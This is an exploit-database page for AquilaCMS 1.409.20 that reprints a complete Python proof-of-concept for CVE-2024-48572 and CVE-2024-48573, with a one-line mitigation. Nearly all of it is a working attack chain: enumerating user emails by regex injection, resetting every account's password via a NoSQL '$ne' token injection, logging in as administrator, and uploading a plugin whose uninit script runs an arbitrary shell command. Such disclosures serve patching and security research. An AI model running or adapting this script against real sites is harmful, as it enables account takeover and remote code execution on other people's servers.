header-logo
Suggest Exploit
vendor:
AquilaCMS
by:
Eui Chul Chung
6.1
CVSS
HIGH
Remote Command Execution (RCE)
RCE
CWE
Product Name: AquilaCMS
Affected Version From: 1.409.20
Affected Version To: 1.409.20
Patch Exists: NO
Related CWE: CVE-2024-48572, CVE-2024-48573
CPE: a:aquilacms_project:aquilacms:1.409.20
Metasploit:
Other Scripts:
Platforms Tested:
2024

AquilaCMS 1.409.20 – Remote Command Execution (RCE)

AquilaCMS 1.409.20 is prone to Remote Command Execution (RCE) due to improper input validation. An attacker can exploit this vulnerability to execute arbitrary commands remotely. This exploit has been assigned CVE-2024-48572 and CVE-2024-48573.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user inputs properly to prevent command injection attacks. Additionally, restricting access to the affected functionality can help reduce the attack surface.
Source

Exploit-DB raw data:

# Exploit Title: AquilaCMS 1.409.20 - Remote Command Execution (RCE)
# Date: 2024-10-25
# Exploit Author: Eui Chul Chung
# Vendor Homepage: https://www.aquila-cms.com/
# Software Link: https://github.com/AquilaCMS/AquilaCMS
# Version: v1.409.20
# CVE: CVE-2024-48572, CVE-2024-48573


import io
import json
import uuid
import string
import zipfile
import argparse
import requests
import textwrap


def unescape_special_characters(email):
    return (
        email.replace("[$]", "$")
        .replace("[*]", "*")
        .replace("[+]", "+")
        .replace("[-]", "-")
        .replace("[.]", ".")
        .replace("[?]", "?")
        .replace(r"[\^]", "^")
        .replace("[|]", "|")
    )


def get_user_emails():
    valid_characters = list(
        string.ascii_lowercase + string.digits + "!#%&'/=@_`{}~"
    ) + ["[$]", "[*]", "[+]", "[-]", "[.]", "[?]", r"[\^]", "[|]"]

    emails_found = []

    next_emails = ["^"]
    while next_emails:
        prev_emails = next_emails
        next_emails = []

        for email in prev_emails:
            found = False
            for ch in valid_characters:
                data = {"email": f"{email + ch}.*"}
                res = requests.put(f"{args.url}/api/v2/user", json=data)

                if json.loads(res.text)["code"] == "UserAlreadyExist":
                    next_emails.append(email + ch)
                    found = True

            if not found:
                emails_found.append(email[1:])
                print(f"[+] {unescape_special_characters(email[1:])}")

    return emails_found


def reset_password(email):
    data = {"email": email}
    requests.post(f"{args.url}/api/v2/user/resetpassword", json=data)

    data = {"token": {"$ne": None}, "password": args.password}
    requests.post(f"{args.url}/api/v2/user/resetpassword", json=data)

    print(f"[+] {unescape_special_characters(email)} : {args.password}")


def get_admin_auth_token(emails):
    for email in emails:
        data = {"username": email, "password": args.password}
        res = requests.post(f"{args.url}/api/v2/auth/login/admin", json=data)

        if res.status_code == 200:
            print(f"[+] Administrator account : {unescape_special_characters(email)}")
            return json.loads(res.text)["data"]

    return None


def create_plugin(plugin_name):
    payload = textwrap.dedent(
        f"""
    const {{ exec }} = require("child_process");

    /**
     * This function is called when the plugin is desactivated or when we delete it
     */
    module.exports = async function (resolve, reject) {{
      try {{
        exec("{args.command}");
        return resolve();
      }} catch (error) {{}}
    }};
    """
    ).strip()

    plugin = io.BytesIO()
    with zipfile.ZipFile(plugin, "a", zipfile.ZIP_DEFLATED, False) as zip_file:
        zip_file.writestr(
            f"{plugin_name}/package.json",
            io.BytesIO(f'{{ "name": "{plugin_name}" }}'.encode()).getvalue(),
        )
        zip_file.writestr(
            f"{plugin_name}/info.json", io.BytesIO(b'{ "info": {} }').getvalue()
        )
        zip_file.writestr(
            f"{plugin_name}/uninit.js", io.BytesIO(payload.encode()).getvalue()
        )

    plugin.seek(0)
    return plugin


def rce(emails):
    auth_token = get_admin_auth_token(emails)
    if auth_token is None:
        print("[-] Administrator account not found")
        return

    print("[+] Create malicious plugin")
    plugin_name = uuid.uuid4().hex
    plugin = create_plugin(plugin_name)

    print("[+] Upload plugin")
    headers = {"Authorization": auth_token}
    files = {"file": (f"{plugin_name}.zip", plugin, "application/zip")}
    requests.post(f"{args.url}/api/v2/modules/upload", headers=headers, files=files)

    print("[+] Find uploaded plugin")
    headers = {"Authorization": auth_token}
    data = {"PostBody": {"limit": 0}}
    res = requests.post(f"{args.url}/api/v2/modules", headers=headers, json=data)

    plugin_id = None
    for data in json.loads(res.text)["datas"]:
        if data["name"] == plugin_name:
            plugin_id = data["_id"]
            print(f"[+] Plugin ID : {plugin_id}")
            break

    if plugin_id is None:
        print("[-] Plugin not found")
        return

    print("[+] Deactivate plugin")
    headers = {"Authorization": auth_token}
    data = {"idModule": plugin_id, "active": False}
    res = requests.post(f"{args.url}/api/v2/modules/toggle", headers=headers, json=data)

    if res.status_code == 200:
        print("[+] Command execution succeeded")
    else:
        print("[-] Command execution failed")


def main():
    print("[*] Retrieve email addresses")
    emails = get_user_emails()

    print("\n[*] Reset password")
    for email in emails:
        reset_password(email)

    print("\n[*] Perform remote code execution")
    rce(emails)


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "-u",
        dest="url",
        help="Site URL (e.g. www.aquila-cms.com)",
        type=str,
        required=True,
    )
    parser.add_argument(
        "-p",
        dest="password",
        help="Password to use for password reset (e.g. HaXX0r3d!)",
        type=str,
        default="HaXX0r3d!",
    )
    parser.add_argument(
        "-c",
        dest="command",
        help="Command to execute (e.g. touch /tmp/pwned)",
        type=str,
        default="touch /tmp/pwned",
    )
    args = parser.parse_args()

    main()